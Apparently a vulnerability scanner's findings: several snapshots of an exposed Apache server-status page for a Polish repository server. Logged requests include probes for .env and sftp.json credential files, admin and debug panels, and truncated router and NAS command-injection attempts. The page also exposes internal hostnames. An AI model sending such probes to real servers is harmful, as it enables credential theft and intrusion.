46.204.102.118h2repo.nimoz.pl:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-95109340/7/417_ 19.102224935070.00.03365.07 167.71.175.236http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-95109340/3/423_ 18.6532623478600.00.0237040.30 167.71.175.236http/1.1 0-95109340/10/389_ 18.64303946900.00.06347.68 167.71.175.236h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-95109340/9/427_ 18.90406039180660.02044.4359394.79 66.240.236.116http/1.1 0-95109340/3/416_ 18.743241465630.00.0261.00 167.71.175.236http/1.1 0-95109340/6/419_ 18.9332828208430.00.031476.40 167.71.175.236http/1.1 0-95109340/5/400_ 11.08404493170.00.042565.54 167.71.175.236http/1.1 0-95109340/7/382_ 18.62406532960.00.03541.40 167.71.175.236h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-95109340/2/399_ 0.324232457150.00.01441.69 167.71.175.236h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-95109340/7/433_ 18.9152748377690.00.052663.10 45.156.129.46http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-95109340/7/659_ 19.0352713998520.00.027256.01 167.71.175.236http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-95109340/6/447_ 19.02963214984270.00.02133763.00 128.199.137.235http/1.1repo.nimoz.pl:443GET /manager/html HTTP/1.1 0-95109340/8/453_ 19.0240602892330.00.03410.65 66.240.236.116http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-95109340/6/388_ 18.908232621846020.00.01115445.68 107.170.255.35http/1.1vm-repo-prd.nimoz.local:80MGLNDD_148.81.110.91_80\n 0-95109340/4/370_ 11.08823256837470.00.0063974.59 138.197.105.152http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-95109340/7/447_ 18.76995025416960.00.032799.88 138.197.105.152http/1.1repo.nimoz.pl:443GET /core/img/favicon.ico HTTP/1.1 1-95109350/3/152_ 0.3376150353600.00.012.40 203.55.81.13http/1.1vm-repo-prd.nimoz.local:80GET /.env HTTP/1.1 1-95109350/0/132_ 0.00786045123250.00.001.39 45.156.128.27http/1.1 1-95109350/1/113_ 0.1378600153640.00.004.95 45.156.128.27http/1.1 1-95109350/0/183_ 0.0078660391640.00.003.03 45.156.128.27http/1.1 1-95109350/1/1889_ 0.127869062195020.00.0028258.98 45.156.128.27http/1.1 1-95109350/0/143_ 0.007875242856200.00.001.45 45.156.128.27http/1.1 1-95109350/1/121_ 0.1294500147380.00.001.95 179.43.190.218http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-95109350/1/129W 0.0800403350.00.0065.20 167.71.175.236http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 1-95109350/1/121_ 0.12003661130.00.00345.82 170.64.196.84http/1.1vm-repo-prd.nimoz.local:80done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-95109350/4/168_ 0.43026231360.00.043.16 167.71.175.236http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-95109350/2/112_ 0.43117446230.00.0176.76 167.71.175.236http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 1-95109350/4/150_ 0.42228732130.00.2159.82 167.71.175.236http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-95109350/1/139_ 0.1230146680.00.002.29 167.71.175.236http/1.1 1-95109350/0/132_ 0.0030214420.00.001.42 167.71.175.236h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-95109350/2/135_ 0.224393597720.00.00345.83 167.71.175.236h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-95109350/5/109_ 0.221235759398780.00.0186.20 162.243.136.32http/1.1 1-95109350/30/181_ 0.211236542300560.00.512.02 162.243.136.32h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-95109350/0/158_ 0.003441228017470.00.00896.74 185.242.226.88http/1.1 1-95109350/1/133_ 0.07460144170700.00.011.56 46.204.102.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-95109350/2/127_ 0.10344126138110.00.031.37 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-95109350/1/158_ 0.284661234778750.00.01426.78 64.226.77.135http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-95109350/3/175_ 0.3546612841325230.00.052038.00 138.197.105.152http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-95109350/0/138_ 0.0076110121710.00.001.22 164.92.169.45http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-95109350/1/242_ 0.34761251422019730.00.012891.24 203.55.81.13http/1.1repo.nimoz.pl:443GET /.env HTTP/1.1 1-95109350/1/151_ 0.0076150817360.00.0081.08 164.92.169.45http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 2-92-0/0/646. 0.002501852417986840.00.00901.74 185.242.226.88http/1.1 2-92-0/0/583. 0.002501853317626470.00.002156.55 185.242.226.88
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448ef343dcd
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Sunday, 28-Apr-2024 20:40:25 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 94 Parent Server MPM Generation: 93 Server uptime: 93 days 10 hours 34 minutes 22 seconds Server load: 0.00 0.00 0.00 Total accesses: 35368 - Total Traffic: 669.2 GB - Total Duration: 107648167 CPU Usage: u44.42 s105.76 cu861.7 cs621.72 - .0202% CPU load .00438 requests/sec - 86.9 kB/second - 19.4 MB/request - 3043.66 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04817no0yes124000 14818no0yes025000 Sum200 149000 __W_______________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-9348170/3/360_ 1.0212810784740.00.00130.92 97.74.88.7http/1.1 0-9348170/2/402_ 1.151281221007940.00.034.69 97.74.88.7http/1.1repo.nimoz.pl:443GET /.env HTTP/1.1 0-9348170/3/419W 0.900078195600.00.00132865.91 143.110.217.244http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-9348170/7/1446_ 1.24120189804980.00.0624865.14 143.110.217.244http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 0-9348170/2/390_ 0.90308731600.00.001437.42 143.110.217.244h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-9348170/5/426_ 1.024809041278520.00.022233.28 138.197.175.94http/1.1vm-repo-prd.nimoz.local:80GET /info.php HTTP/1.1 0-9348170/3/348_ 1.02128105491590.00.0134601.97 45.142.182.92http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-9348170/2/448_ 0.8148092932328030.00.013140.63 138.197.175.94http/1.1 0-9348170/4/413_ 1.0248090728400.00.002.76 198.199.104.19http/1.1vm-repo-prd.nimoz.local:80GET /actuator/health HTTP/1.1 0-9348170/3/400_ 1.240234933330.00.01364.96 143.110.217.244http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 0-9348170/2/411_ 0.9042723477610.00.0137040.24 143.110.217.244http/1.1 0-9348170/3/372_ 1.151279193945330.00.03347.58 97.74.88.7http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-9348170/4/411_ 0.981279021079250.00.0357350.34 103.245.236.120http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&sys 0-9348170/4/403_ 1.166251464090.00.0360.94 143.110.217.244http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-9348170/4/406_ 1.1338292828206760.00.021476.33 185.180.143.8http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-9348170/3/386_ 0.99504425690.00.022565.43 143.110.217.244h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-9348170/5/367_ 0.99406532150.00.02541.35 143.110.217.244http/1.1 0-9348170/7/391_ 1.01602455810.00.06441.61 138.197.175.94http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-9348170/5/421_ 1.020048376430.00.022663.05 138.197.175.94http/1.1vm-repo-prd.nimoz.local:80GET /systembc/password.php HTTP/1.1 0-9348170/7/640_ 0.785113995680.00.057255.89 143.110.217.244http/1.1 0-9348170/2/434_ 1.0253114983210.00.03133762.97 143.110.217.244h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-9348170/2/437_ 1.02302890490.00.00410.56 143.110.217.244http/1.1 0-9348170/8/378_ 1.2322521844310.00.03115445.63 143.110.217.244http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 0-9348170/4/358_ 1.02382806836050.00.0363974.56 190.30.139.114http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-9348170/4/432_ 1.131283025405970.00.002799.77 97.74.88.7http/1.1vm-repo-prd.nimoz.local:80GET /.env HTTP/1.1 1-9348180/1/147_ 0.0330353050.00.002.36 143.110.217.244http/1.1 1-9348180/2/128_ 0.27325122430.00.031.34 143.110.217.244http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-9348180/0/111_ 0.00225153640.00.004.94 165.154.40.244http/1.1repo.nimoz.pl:443t3 12.1.2\n 1-9348180/2/180_ 0.27227391430.00.013.01 143.110.217.244http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 1-9348180/1/1886_ 0.2712662195010.00.0128258.98 143.110.217.244http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 1-9348180/1/140_ 0.0710053252855420.00.011.41 138.197.175.94http/1.1 1-9348180/1/119_ 0.0812810147380.00.011.95 118.26.39.25h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-9348180/2/127_ 0.2112800403300.00.0065.15 97.74.88.7http/1.1vm-repo-prd.nimoz.local:80POST / HTTP/1.1 1-9348180/2/118_ 0.201005203661120.00.00345.81 138.197.175.94http/1.1vm-repo-prd.nimoz.local:80GET /password.php HTTP/1.1 1-9348180/2/160_ 0.20100530230130.00.013.08 138.197.175.94http/1.1vm-repo-prd.nimoz.local:80GET /1.php HTTP/1.1 1-9348180/0/108_ 0.001005427446060.00.0076.75 138.197.175.94http/1.1 1-9348180/1/144_ 0.021005229624590.00.0259.58 138.197.175.94http/1.1 1-9348180/0/137_ 0.00127925146680.00.002.29 97.74.88.7http/1.1 1-9348180/0/127_ 0.0054110213860.00.001.40 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-9348180/1/129_ 0.075410303596240.00.01345.83 185.242.226.88http/1.1 1-9348180/0/102_ 0.00100531364040.00.0086.18 138.197.175.94http/1.1 1-9348180/1/150_ 0.27024271900.00.011.51 143.110.217.244http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-9348180/2/157_ 0.221278248017250.00.01896.72 97.74.88.7http/1.1repo.nimoz.pl:443POST / HTTP/1.1 1-9348180/0/127_ 0.00127817169560.00.001.50 185.242.226.88http/1.1 1-9348180/2/123_ 0.20528137130.00.021.33 143.110.217.244h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-9348180/2/153_ 0.211282254778240.00.01426.75 97.74.88.7http/1.1repo.nimoz.pl:443GET /.env HTTP/1.1 1-9348180/1/170_ 0.201041324160.00.002037.94 138.197.175.94http/1.1vm-repo-prd.nimoz.local:80GET /upl.php HTTP/1.1 1-9348180/2/133_ 0.20100540121480.00.011.21 138.197.175.94http/1.1vm-repo-prd.nimoz.local:80GET /geoip/ HTTP/1.1 1-9348180/1/238_ 0.0942722014260.00.012891.17 143.110.217.244h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-9348180/2/147_ 0.20100530817050.00.0181.05 138.197.175.94http/1.1vm-repo-prd.nimoz.local:80GET /files/ HTTP/1.1 2-92-0/0/646. 0.00744222417986840.00.00901.74 185.242.226.88http/1.1 2-92-0/0/583. 0.00744223317626470.00.002156.55 185.242.226.88http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44827d8cd45
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Thursday, 25-Apr-2024 05:47:26 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 91 Parent Server MPM Generation: 90 Server uptime: 89 days 19 hours 41 minutes 23 seconds Server load: 0.00 0.00 0.00 Total accesses: 34245 - Total Traffic: 669.2 GB - Total Duration: 107472277 CPU Usage: u41.95 s101.7 cu854.49 cs621.19 - .0209% CPU load .00441 requests/sec - 90.4 kB/second - 20.0 MB/request - 3138.33 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 224653no0yes025000 324654no0yes124000 Sum200 149000 ..................................................______________ _____________W______________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-89-0/0/357. 0.00208410784740.00.00130.92 23.239.8.32http/1.1 0-89-0/0/400. 0.0020841291007480.00.004.66 205.210.31.225http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-89-0/0/416. 0.0020841078195590.00.00132865.91 205.210.31.225http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-89-0/0/1439. 0.002084118189803950.00.0024865.08 165.232.73.237http/1.1repo.nimoz.pl:443GET /autodiscover/autodiscover%20/ HTTP/1.1 0-89-0/0/388. 0.0020841308731600.00.001437.42 170.64.199.243http/1.1 0-89-0/0/421. 0.00208411841278220.00.002233.26 165.232.73.237http/1.1repo.nimoz.pl:443GET /autodiscove/ HTTP/1.1 0-89-0/0/345. 0.0020841295491570.00.0034601.96 172.105.77.209http/1.1 0-89-0/0/446. 0.00208412832327740.00.003140.62 170.64.199.243http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-89-0/0/409. 0.00208410728400.00.002.75 152.42.176.18http/1.1 0-89-0/0/397. 0.0020841184933090.00.00364.95 165.232.73.237http/1.1repo.nimoz.pl:443GET /ews/autodiscovers/ HTTP/1.1 0-89-0/0/409. 0.00208411823477340.00.0037040.22 165.232.73.237http/1.1repo.nimoz.pl:443GET /ews/%20/ HTTP/1.1 0-89-0/0/369. 0.0020841313944840.00.00347.55 170.64.199.243http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-89-0/0/407. 0.00208411821078690.00.0057350.31 165.232.73.237http/1.1repo.nimoz.pl:443GET /ews/exchange%20/ HTTP/1.1 0-89-0/0/399. 0.0020841261463540.00.0060.91 165.232.73.237http/1.1repo.nimoz.pl:443GET /Temporary_Listen_Addresses HTTP/1.1 0-89-0/0/402. 0.0020841028206470.00.001476.31 170.64.199.243http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-89-0/0/383. 0.002084104425370.00.002565.42 192.12.240.40http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-89-0/0/362. 0.002084106531860.00.00541.33 46.174.191.29http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-89-0/0/384. 0.002084102454700.00.00441.55 170.64.199.243http/1.1 0-89-0/0/416. 0.0020841048376190.00.002663.03 170.64.199.243http/1.1vm-repo-prd.nimoz.local:80GET /password.php HTTP/1.1 0-89-0/0/633. 0.0020841013994760.00.007255.84 170.64.199.243http/1.1 0-89-0/0/432. 0.0020841014982610.00.00133762.94 170.64.199.243http/1.1vm-repo-prd.nimoz.local:80GET /systembc/password.php HTTP/1.1 0-89-0/0/435. 0.002084102890490.00.00410.56 170.64.199.243http/1.1vm-repo-prd.nimoz.local:80GET /1.php HTTP/1.1 0-89-0/0/370. 0.0020841021843810.00.00115445.59 45.142.182.92http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-89-0/0/354. 0.002084106835490.00.0063974.53 170.64.199.243http/1.1vm-repo-prd.nimoz.local:80GET /geoip/ HTTP/1.1 0-89-0/0/428. 0.0020841025405970.00.002799.77 170.64.199.243http/1.1 1-89-0/0/146. 0.002084111353050.00.002.36 185.180.143.74http/1.1 1-89-0/0/126. 0.002084119121880.00.001.31 165.232.73.237http/1.1repo.nimoz.pl:443GET /ews/exchanges/ HTTP/1.1 1-89-0/0/111. 0.002084125153640.00.004.94 170.64.199.243http/1.1 1-89-0/0/178. 0.00208410391160.00.003.00 170.64.199.243http/1.1vm-repo-prd.nimoz.local:80GET /info.php HTTP/1.1 1-89-0/0/1885. 0.00208412062194750.00.0028258.97 170.64.199.243http/1.1 1-89-0/0/139. 0.002084102855170.00.001.39 170.64.199.243http/1.1vm-repo-prd.nimoz.local:80GET /files/ HTTP/1.1 1-89-0/0/118. 0.00208410147380.00.001.94 170.64.199.243http/1.1 1-89-0/0/125. 0.00208410403300.00.0065.15 170.64.199.243http/1.1vm-repo-prd.nimoz.local:80GET /bundle.js HTTP/1.1 1-89-0/0/116. 0.0020841233661120.00.00345.81 170.64.199.243http/1.1 1-89-0/0/158. 0.00208410229920.00.003.07 170.64.199.243http/1.1vm-repo-prd.nimoz.local:80GET /favicon.ico HTTP/1.1 1-89-0/0/108. 0.002084127446060.00.0076.75 170.64.199.243http/1.1 1-89-0/0/143. 0.00208410624300.00.0059.57 170.64.199.243http/1.1vm-repo-prd.nimoz.local:80GET /form.html HTTP/1.1 1-89-0/0/137. 0.002084125146680.00.002.29 45.142.182.92http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-89-0/0/127. 0.00208410213860.00.001.40 3.239.82.142http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-89-0/0/128. 0.0020841243595940.00.00345.82 34.77.127.183http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-89-0/0/102. 0.00208411364040.00.0086.18 179.43.190.218http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-89-0/0/149. 0.002084124271650.00.001.50 80.66.83.49http/1.1 1-89-0/0/155. 0.0020841188017000.00.00896.71 165.232.73.237http/1.1repo.nimoz.pl:443GET /autodiscover/autodiscoverrs/ HTTP/1.1 1-89-0/0/127. 0.002084117169560.00.001.50 165.232.73.237http/1.1repo.nimoz.pl:443GET /autodiscover/autodiscovers/ HTTP/1.1 1-89-0/0/121. 0.002084130136840.00.001.31 45.156.128.45http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-89-0/0/151. 0.0020841274777980.00.00426.74 185.180.143.74http/1.1 1-89-0/0/169. 0.00208411841324160.00.002037.94 165.232.73.237http/1.1repo.nimoz.pl:443GET /ews/ews/ HTTP/1.1 1-89-0/0/131. 0.002084124121210.00.001.19 185.180.143.79http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-89-0/0/237. 0.0020841022013990.00.002891.15 185.180.143.74http/1.1 1-89-0/0/145. 0.002084117817040.00.0081.04 165.232.73.237http/1.1repo.nimoz.pl:443GET /ews/exchange/ HTTP/1.1 2-90246530/4/583_ 0.4902417788740.00.03898.63 96.126.110.181http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-90246530/2/561_ 0.301238017603150.00.002156.44 104.152.52.191h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4488a1c3292
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Thursday, 18-Apr-2024 20:22:48 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 84 Parent Server MPM Generation: 83 Server uptime: 83 days 10 hours 16 minutes 46 seconds Server load: 0.00 0.00 0.00 Total accesses: 33225 - Total Traffic: 669.2 GB - Total Duration: 107450550 CPU Usage: u40.11 s94.37 cu841.44 cs620.3 - .0221% CPU load .00461 requests/sec - 97.3 kB/second - 20.6 MB/request - 3234.03 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 23244no0yes124000 33245no0yes025000 Sum200 149000 .................................................._W____________ ____________________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-78-0/0/344. 0.004189670783460.00.00130.82 154.212.141.189h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-78-0/0/391. 0.0041896701006380.00.004.60 154.212.141.189http/1.1 0-78-0/0/402. 0.00418967078195060.00.00132865.88 154.212.141.189http/1.1 0-78-0/0/1432. 0.004189670189803250.00.0024865.04 154.212.141.189h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-78-0/0/378. 0.0041896708731040.00.001437.38 154.212.141.189h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-78-0/0/406. 0.00418967041277070.00.002233.20 194.120.230.95http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-78-0/0/338. 0.0041896705490470.00.0034601.89 212.102.40.218h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-78-0/0/434. 0.004189673132327140.00.003140.57 192.241.203.76http/1.1 0-78-0/0/405. 0.004189670728390.00.002.75 192.241.203.76http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-78-0/0/387. 0.0041896704932050.00.00364.88 45.79.170.185http/1.1 0-78-0/0/396. 0.004189672923476060.00.0037040.14 154.212.141.189http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-78-0/0/356. 0.0041896703943980.00.00347.50 192.3.108.202http/1.1 0-78-0/0/400. 0.00418967021078240.00.0057350.29 192.3.108.202http/1.1 0-78-0/0/384. 0.00418967311462430.00.0060.84 192.3.108.202http/1.1 0-78-0/0/390. 0.00418967028205090.00.001476.23 185.242.226.88http/1.1 0-78-0/0/374. 0.0041896704424800.00.002565.37 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-78-0/0/355. 0.0041896706530990.00.00541.28 185.242.226.88http/1.1 0-78-0/0/376. 0.0041896702454140.00.00441.51 185.242.226.88http/1.1 0-78-0/0/405. 0.00418967048375300.00.002662.99 185.242.226.88http/1.1 0-78-0/0/621. 0.004189672413993960.00.007255.77 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-78-0/0/420. 0.004189672214981370.00.00133762.88 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-78-0/0/426. 0.00418967262889910.00.00410.53 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-78-0/0/358. 0.004189672521842750.00.00115445.53 154.212.141.189h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-78-0/0/344. 0.00418967246834900.00.0063974.50 154.212.141.189http/1.1 0-78-0/0/421. 0.00418967025405420.00.002799.73 154.212.141.189http/1.1 1-78-0/0/141. 0.004189670343250.00.001.83 212.102.40.218h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-78-0/0/123. 0.0041896723121360.00.001.28 212.102.40.218http/1.1 1-78-0/0/107. 0.004189670143570.00.004.42 212.102.40.218h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-78-0/0/173. 0.004189670390560.00.002.96 212.102.40.218http/1.1 1-78-0/0/1882. 0.004189672262194230.00.0028258.93 185.242.226.88http/1.1 1-78-0/0/135. 0.0041896702854890.00.001.38 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-78-0/0/116. 0.004189670147110.00.001.92 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-78-0/0/121. 0.004189670403040.00.0065.13 174.138.94.82http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-78-0/0/116. 0.00418967233661120.00.00345.81 148.153.45.238http/1.1repo.nimoz.pl:443GET /aab9 HTTP/1.1 1-78-0/0/155. 0.0041896724229920.00.003.07 148.153.45.238http/1.1repo.nimoz.pl:443GET /aab8 HTTP/1.1 1-78-0/0/108. 0.0041896727446060.00.0076.75 148.153.45.238http/1.1repo.nimoz.pl:443GET /a4Yn HTTP/1.1 1-78-0/0/137. 0.0041896730623980.00.0059.55 64.62.197.28http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-78-0/0/135. 0.004189670146150.00.002.25 164.52.0.94http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-78-0/0/123. 0.004189670213860.00.001.39 87.236.176.56h2repo.nimoz.pl:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-78-0/0/124. 0.0041896703595420.00.00345.78 185.242.226.88http/1.1 1-78-0/0/99. 0.0041896727364020.00.0086.17 87.236.176.253http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-78-0/0/147. 0.004189670271400.00.001.48 80.66.83.49http/1.1 1-78-0/0/152. 0.00418967298016530.00.00896.67 185.180.143.72http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-78-0/0/124. 0.004189670169380.00.001.49 185.242.226.88http/1.1 1-78-0/0/115. 0.004189670135790.00.001.24 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-78-0/0/149. 0.0041896704777460.00.00426.71 185.242.226.88http/1.1 1-78-0/0/167. 0.004189671741323710.00.002037.91 185.242.226.88h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-78-0/0/129. 0.004189670120710.00.001.16 154.212.141.189http/1.1 1-78-0/0/234. 0.00418967022013990.00.002891.15 154.212.141.189h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-78-0/0/142. 0.004189670816600.00.0081.01 154.212.141.189h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-8332440/4/561_ 1.2502117786520.00.03898.49 206.81.24.74http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 2-8332440/7/536W 1.050017600690.00.082156.29 206.81.24.74http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 2-8332440/10/427_ 1.250224001080.00.10270.37 206.81.24.74http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 2-8332440/5/422
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4480a7a252a
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Wednesday, 10-Apr-2024 16:22:58 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 76 Parent Server MPM Generation: 75 Server uptime: 75 days 6 hours 16 minutes 55 seconds Server load: 0.08 0.02 0.01 Total accesses: 31736 - Total Traffic: 669.2 GB - Total Duration: 107394220 CPU Usage: u41.05 s88.79 cu820.16 cs615.98 - .0241% CPU load .00488 requests/sec - 107.9 kB/second - 21.6 MB/request - 3383.99 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 08468no0yes124000 18469no0yes025000 Sum200 149000 _____________W____________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-7584680/16/328_ 7.3417960771700.0128.03130.73 159.65.51.227http/1.1vm-repo-prd.nimoz.local:80GET /favicon.ico HTTP/1.1 0-7584680/10/350_ 7.48129973960.00.233.80 64.226.78.121http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-7584680/9/384_ 7.46438078192900.00.02132865.77 87.246.7.66http/1.1 0-7584680/44/1418_ 7.09122189794340.060.6824864.98 64.225.54.88http/1.1 0-7584680/13/357_ 7.31008569280.062.301436.84 64.226.78.121http/1.1 0-7584680/27/395_ 7.340041276280.00.872233.14 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7584680/7/328_ 7.31005489480.00.1834601.84 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-7584680/13/421_ 7.431796032325380.0122.123140.44 64.225.54.88http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-7584680/8/388_ 7.051898534727410.00.012.68 37.19.223.219http/1.1 0-7584680/12/374_ 7.46180104925460.00.49364.78 